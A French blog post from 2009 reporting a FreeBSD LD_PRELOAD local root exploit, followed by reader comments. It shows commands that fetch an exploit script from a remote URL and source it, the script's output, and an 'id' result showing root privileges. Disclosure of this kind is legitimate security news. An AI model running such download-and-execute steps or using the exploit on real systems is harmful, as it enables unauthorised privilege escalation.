Local Root Exploit : FreeBSD LD_PRELOAD Security Bypass


FreeBSD
Une faille critique vient d'être découverte dans le noyau de FreeBSD en version 7.0, 7.1 et 8.0. Cette dernière est à prendre très au sérieux étant donnée qu'elle permet à un simple utilisateur d'obtenir les privilèges root sur une machine.

Voici un exemple d'utilisation de l'exploit :

# fetch www.tux-planet.fr/public/hack/exploits/kernel/freebsd-8-local-root-exploit.sh
# source freebsd-8-local-root-exploit.sh
...
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX

Ce qui donne par la suite :

# id
uid=1001(user) gid=1001(users) euid=0(root) groups=1001(users)

La faille de sécurité se situe au niveau de LD_PRELOAD, une variable d'environnement qui permet de spécifier les bibliothèques qui seront chargée au démarrage d'un programme. Avec un comportement normal, LD_PRELOAD empêche le chargement de binaire, ce qui n'est as le cas dans l'exploit utilisé ici.


4 Commentaires pour "Local Root Exploit : FreeBSD LD_PRELOAD Security Bypass"

Flux des commentaires de cet article Ajouter un commentaire
  •  
    Jérôme M. , le 1 décembre 2009 à 16:08
  •  

    C'est moi ou tux-planet.fr se met au haking depuis quelques temps?
    Ca n'est pas un mal c'est fun est on apprend beaucoup. Et puis tout les informaticiens ou leur période "hackeur", ca part, puis ca revient, ca me rappelle le bon temps faudrait que je m'y remette!

    RépondreRépondre
    bibitte , le 1 décembre 2009 à 18:21
  •  

    @Jérôme M. : ils ont réagi très vite pour nous sortir un patch !

    @bibitte : pas plus qu'avant. Regarde la section Sécurité, les articles, tu verras que ça fait longtemps que je m'intéresse à ce domaine ...

    RépondreRépondre
    pti-seb , le 2 décembre 2009 à 00:05
  •  

    @pti-seb : Ils sont toujours au taquet :D

    RépondreRépondre
    Jérôme M. , le 2 décembre 2009 à 01:14
 

Ajouter un commentaire

actualité android apache apple astuce astuces bash bilboblog blog boot chrome clavier commande commandes conky date debian Desktop développement elementary exploit faille fedora firefox flash gimp gnome google graphique Graphisme hack hacking Hardware humour intel internet iphone jailbreak Jeux Kde kernel libre Linux log logiciels Logiciels Libres lucid lynx maemo mail maquette metasploit microsoft mobile mockup monitoring mozilla multi-touch musique mysql n900 nautilus nokia noyau openoffice open source password photos php Planet publicité red hat redhat rpm réseau screenshot script serveur serveurs shell sql ssh statistiques sysadmin system Sécurité thème tux-planet tv twitter ubuntu unity vidéo vidéos vlc voyage wallpaper windows wordpress yum